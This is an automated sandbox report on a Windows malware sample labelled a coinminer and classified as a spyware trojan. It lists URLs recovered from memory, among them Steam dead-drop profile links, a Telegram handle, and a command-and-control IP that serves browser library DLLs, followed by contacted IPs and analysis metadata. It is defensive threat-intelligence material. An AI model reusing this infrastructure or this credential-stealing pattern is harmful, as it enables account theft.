                                                https://store.steampowered.com/subscriber_agreement/MSBuild.exe, 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drfalse
                                                  		high
                                                  https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6MSBuild.exe, 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drfalse
                                                    		high
                                                    https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=L35TrLJDfqtD&amp;l=englMSBuild.exe, 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drfalse
                                                      		high
                                                      https://37.27.87.155/MgrIMSBuild.exe, 00000001.00000002.2135698617.0000000000E9E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        https://37.27.87.155/mozglue.dllzMSBuild.exe, 00000001.00000002.2135698617.0000000000E9E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		unknown
                                                          https://37.27.87.155/ramDataMSBuild.exe, 00000001.00000002.2135698617.0000000000E67000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		unknown
                                                            http://www.valvesoftware.com/legal.htmMSBuild.exe, 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drfalse
                                                              		high
                                                              https://37.27.87.155/freebl3.dllVMSBuild.exe, 00000001.00000002.2135698617.0000000000E9E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		unknown
                                                                https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&ampMSBuild.exe, 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drfalse
                                                                  		high
                                                                  https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngMSBuild.exe, 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drfalse
                                                                    		high
                                                                    https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pngMSBuild.exe, 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drfalse
                                                                      		high
                                                                      https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17rer.exeMSBuild.exe, 00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://community.akamai.steamstatic.com/public/javascript/global.js?v=B7Vsdo1okyaC&amp;l=englishMSBuild.exe, 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drfalse
                                                                          		high
                                                                          https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20FeedbackMSBuild.exe, 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drfalse
                                                                            		high
                                                                            https://community.akamai.steamstatic.com/public/javascript/profile.js?v=Iy1ies1ROjUT&amp;l=englishMSBuild.exe, 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drfalse
                                                                              		high
                                                                              https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=SPpMitTYp6ku&amp;l=enMSBuild.exe, 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drfalse
                                                                                		high
                                                                                https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tLMSBuild.exe, 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drfalse
                                                                                  		high
                                                                                  https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=1_BxDGVvfXwv&amMSBuild.exe, 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drfalse
                                                                                    		high
                                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameSecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1750736116.00000000030D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=Kg_v7CMMMSBuild.exe, 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drfalse
                                                                                        		high
                                                                                        https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=jU8h8CqVh6FY&amp;l=eMSBuild.exe, 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drfalse
                                                                                          		high
                                                                                          https://steamcommunity.com/profiles/76561199673019888HMSBuild.exe, 00000001.00000002.2135698617.0000000000E67000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://www.mozilla.com/en-US/blocklist/MSBuild.exe, MSBuild.exe, 00000001.00000002.2153445021.000000006CB2D000.00000002.00000001.01000000.0000000A.sdmp, mozglue.dll.1.dr, mozglue[1].dll.1.drfalse
                                                                                              		high
                                                                                              https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&amp;l=englishMSBuild.exe, 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drfalse
                                                                                                		high
                                                                                                https://mozilla.org0/nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drfalse
                                                                                                • URL Reputation: safe
                                                                                                		unknown
                                                                                                https://stackoverflow.com/q/14436606/23354SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1750736116.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1761316124.0000000005EF0000.00000004.08000000.00040000.00000000.sdmp, SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1752049015.0000000004209000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1752049015.000000000414D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=BMF068jICwP9&amp;MSBuild.exe, 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drfalse
                                                                                                    		high
                                                                                                    http://store.steampowered.com/privacy_agreement/MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drfalse
                                                                                                      		high
                                                                                                      https://store.steampowered.com/points/shop/MSBuild.exe, 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drfalse
                                                                                                        		high
                                                                                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=DBKKKEHD.1.drfalse
                                                                                                          		high
                                                                                                          https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016MSBuild.exe, 00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmp, HIDAFHDH.1.drfalse
                                                                                                            		high
                                                                                                            https://steamcommunity.com/profiles/76561199673019888/badgesMSBuild.exe, 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drfalse
                                                                                                              		high
                                                                                                              https://www.ecosia.org/newtab/DBKKKEHD.1.drfalse
                                                                                                                		high
                                                                                                                https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brAKKFHDAKECFHIDHJDAAAEBKJEC.1.drfalse
                                                                                                                  		high
                                                                                                                  https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg76561199673019888[1].htm.1.drfalse
                                                                                                                    		high
                                                                                                                    https://store.steampowered.com/privacy_agreement/MSBuild.exe, 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drfalse
                                                                                                                      		high
                                                                                                                      https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0MSBuild.exe, 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drfalse
                                                                                                                        		high
                                                                                                                        https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=englishMSBuild.exe, 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drfalse
                                                                                                                          		high
                                                                                                                          https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=englishMSBuild.exe, 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drfalse
                                                                                                                            		high
                                                                                                                            https://37.27.87.155AKKFHMSBuild.exe, 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                                              		low
                                                                                                                              https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.pngMSBuild.exe, 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drfalse
                                                                                                                                		high
                                                                                                                                https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesHIDAFHDH.1.drfalse
                                                                                                                                  		high
                                                                                                                                  https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&amp;l=englisMSBuild.exe, 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drfalse
                                                                                                                                    		high
                                                                                                                                    https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhCMSBuild.exe, 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drfalse
                                                                                                                                      		high
                                                                                                                                      https://store.steampowered.com/about/76561199673019888[1].htm.1.drfalse
                                                                                                                                        		high
                                                                                                                                        https://37.27.87.155/9MSBuild.exe, 00000001.00000002.2135698617.0000000000E67000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          		unknown
                                                                                                                                          https://steamcommunity.com/my/wishlist/MSBuild.exe, 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drfalse
                                                                                                                                            		high
                                                                                                                                            https://t.me/irfailAtSecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1750736116.000000000338D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1752049015.0000000004381000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDFAKKFHDAKECFHIDHJDAAAEBKJEC.1.drfalse
                                                                                                                                                		high
                                                                                                                                                https://37.27.87.155/1;WMSBuild.exe, 00000001.00000002.2135698617.0000000000E9E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  		unknown
                                                                                                                                                  https://github.com/mgravell/protobuf-netJSecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1750736116.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1761316124.0000000005EF0000.00000004.08000000.00040000.00000000.sdmp, SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1752049015.0000000004209000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1752049015.000000000414D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    https://37.27.87.155/1MSBuild.exe, 00000001.00000002.2135698617.0000000000E67000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                                                                                                                                    https://help.steampowered.com/en/MSBuild.exe, 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drfalse
                                                                                                                                                      		high
                                                                                                                                                      https://steamcommunity.com/market/MSBuild.exe, 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drfalse
                                                                                                                                                        		high
                                                                                                                                                        https://store.steampowered.com/news/MSBuild.exe, 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drfalse
                                                                                                                                                          		high
                                                                                                                                                          https://37.27.87.155/nd-point:MSBuild.exe, 00000001.00000002.2135698617.0000000000E83000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            		unknown
                                                                                                                                                            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=DBKKKEHD.1.drfalse
                                                                                                                                                              		high
                                                                                                                                                              http://store.steampowered.com/subscriber_agreement/MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drfalse
                                                                                                                                                                		high
                                                                                                                                                                https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgMSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drfalse
                                                                                                                                                                  		high
                                                                                                                                                                  https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17MSBuild.exe, 00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmp, HIDAFHDH.1.drfalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&amp;l=enMSBuild.exe, 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://steamcommunity.com/discussions/MSBuild.exe, 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drfalse
                                                                                                                                                                        		high
                                                                                                                                                                        https://store.steampowered.com/stats/MSBuild.exe, 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drfalse
                                                                                                                                                                          		high
                                                                                                                                                                          https://37.27.87.155/27.87.155/nss3.dllMSBuild.exe, 00000001.00000002.2135698617.0000000000E67000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            		unknown
                                                                                                                                                                            https://github.com/mgravell/protobuf-netiSecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1750736116.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1761316124.0000000005EF0000.00000004.08000000.00040000.00000000.sdmp, SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1752049015.0000000004209000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1752049015.000000000414D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              		high
                                                                                                                                                                              https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1MSBuild.exe, 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drfalse
                                                                                                                                                                                		high
                                                                                                                                                                                https://store.steampowered.com/steam_refunds/MSBuild.exe, 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  https://steamcommunity.com/GMSBuild.exe, 00000001.00000002.2135698617.0000000000E67000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    https://stackoverflow.com/q/11564914/23354;SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1750736116.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1761316124.0000000005EF0000.00000004.08000000.00040000.00000000.sdmp, SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1752049015.0000000004209000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1752049015.000000000414D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17InstallHIDAFHDH.1.drfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchDBKKKEHD.1.drfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=96N66CvLHly8&aMSBuild.exe, 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drfalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            https://steamcommunity.com/workshop/MSBuild.exe, 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drfalse
                                                                                                                                                                                              		high
                                                                                                                                                                                              https://t.me/irfailSecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1750736116.000000000338D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1752049015.0000000004381000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, MSBuild.exe, 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                                                                                                                		high
                                                                                                                                                                                                https://37.27.87.155/BMSBuild.exe, 00000001.00000002.2135698617.0000000000E67000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  		unknown
                                                                                                                                                                                                  https://store.steampowered.com/legal/MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drfalse
                                                                                                                                                                                                    		high
                                                                                                                                                                                                    https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&amp;l=eMSBuild.exe, 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drfalse
                                                                                                                                                                                                      		high
                                                                                                                                                                                                      http://www.sqlite.org/copyright.html.MSBuild.exe, 00000001.00000002.2149153992.000000001997D000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2139609144.00000000139D5000.00000004.00000020.00020000.00000000.sdmp, sqln[1].dll.1.drfalse
                                                                                                                                                                                                        		high
                                                                                                                                                                                                        https://37.27.87.155/DMSBuild.exe, 00000001.00000002.2135698617.0000000000E67000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSvMSBuild.exe, 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drfalse
                                                                                                                                                                                                            		high
                                                                                                                                                                                                            https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&amp;l=engl76561199673019888[1].htm.1.drfalse
                                                                                                                                                                                                              		high
                                                                                                                                                                                                              https://www.google.com/images/branding/product/ico/googleg_lodp.icoDBKKKEHD.1.drfalse
                                                                                                                                                                                                                		high
                                                                                                                                                                                                                https://37.27.87.155/freebl3.dll(MSBuild.exe, 00000001.00000002.2135698617.0000000000E9E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  		unknown
                                                                                                                                                                                                                  https://37.27.87.155/rMSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    		unknown
                                                                                                                                                                                                                    https://37.27.87.155/etsMSBuild.exe, 00000001.00000002.2135698617.0000000000E9E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                                      https://github.com/mgravell/protobuf-netSecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1750736116.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1761316124.0000000005EF0000.00000004.08000000.00040000.00000000.sdmp, SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1752049015.0000000004209000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1752049015.000000000414D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        		high

                                                                                                                                                                                                                        World Map of Contacted IPs

                                                                                                                                                                                                                        • No. of IPs < 25%
                                                                                                                                                                                                                        • 25% < No. of IPs < 50%
                                                                                                                                                                                                                        • 50% < No. of IPs < 75%
                                                                                                                                                                                                                        • 75% < No. of IPs

                                                                                                                                                                                                                        Public IPs

                                                                                                                                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                        37.27.87.155
                                                                                                                                                                                                                        		unknownIran (ISLAMIC Republic Of)
                                                                                                                                                                                                                        		39232UNINETAZfalse
                                                                                                                                                                                                                        23.76.43.59
                                                                                                                                                                                                                        		steamcommunity.comUnited States
                                                                                                                                                                                                                        		19037AMXArgentinaSAARfalse

                                                                                                                                                                                                                        General Information

                                                                                                                                                                                                                        Joe Sandbox version:40.0.0 Tourmaline
                                                                                                                                                                                                                        Analysis ID:1429063
                                                                                                                                                                                                                        Start date and time:2024-04-20 14:27:07 +02:00
                                                                                                                                                                                                                        Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                        Overall analysis duration:0h 7m 56s
                                                                                                                                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                        Report type:full
                                                                                                                                                                                                                        Cookbook file name:default.jbs
                                                                                                                                                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                        Number of analysed new started processes analysed:5
                                                                                                                                                                                                                        Number of new started drivers analysed:0
                                                                                                                                                                                                                        Number of existing processes analysed:0
                                                                                                                                                                                                                        Number of existing drivers analysed:0
                                                                                                                                                                                                                        Number of injected processes analysed:0
                                                                                                                                                                                                                        Technologies:
                                                                                                                                                                                                                        • HCA enabled
                                                                                                                                                                                                                        • EGA enabled
                                                                                                                                                                                                                        • AMSI enabled
                                                                                                                                                                                                                        Analysis Mode:default
                                                                                                                                                                                                                        Analysis stop reason:Timeout
                                                                                                                                                                                                                        Sample name:SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe
                                                                                                                                                                                                                        Detection:MAL
                                                                                                                                                                                                                        Classification:mal100.troj.spyw.evad.winEXE@3/26@1/2
                                                                                                                                                                                                                        EGA Information:
                                                                                                                                                                                                                        • Successful, ratio: 50%
                                                                                                                                                                                                                        HCA Information:
                                                                                                                                                                                                                        • Successful, ratio: 98%
                                                                                                                                                                                                                        • Number of executed functions: 286
                                                                                                                                                                                                                        • Number of non-executed functions: 68
                                                                                                                                                                                                                        Cookbook Comments:
                                                                                                                                                                                                                        • Found application associated with file extension: .exe
                                                                                                                                                                                                                        • Stop behavior analysis, all processes terminated

                                                                                                                                                                                                                        Warnings

                                                                                                                                                                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
                                                                                                                                                                                                                        • Excluded IPs from analysis (whitelisted): 13.85.23.86, 69.164.42.0, 192.229.211.108, 20.242.39.171
                                                                                                                                                                                                                        • Excluded domains from analysis (whitelisted): fe3.delivery.mp.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, ctldl.windowsupdate.com, wu-bg-shim.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                                        • Execution Graph export aborted for target SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, PID 6308 because it is empty
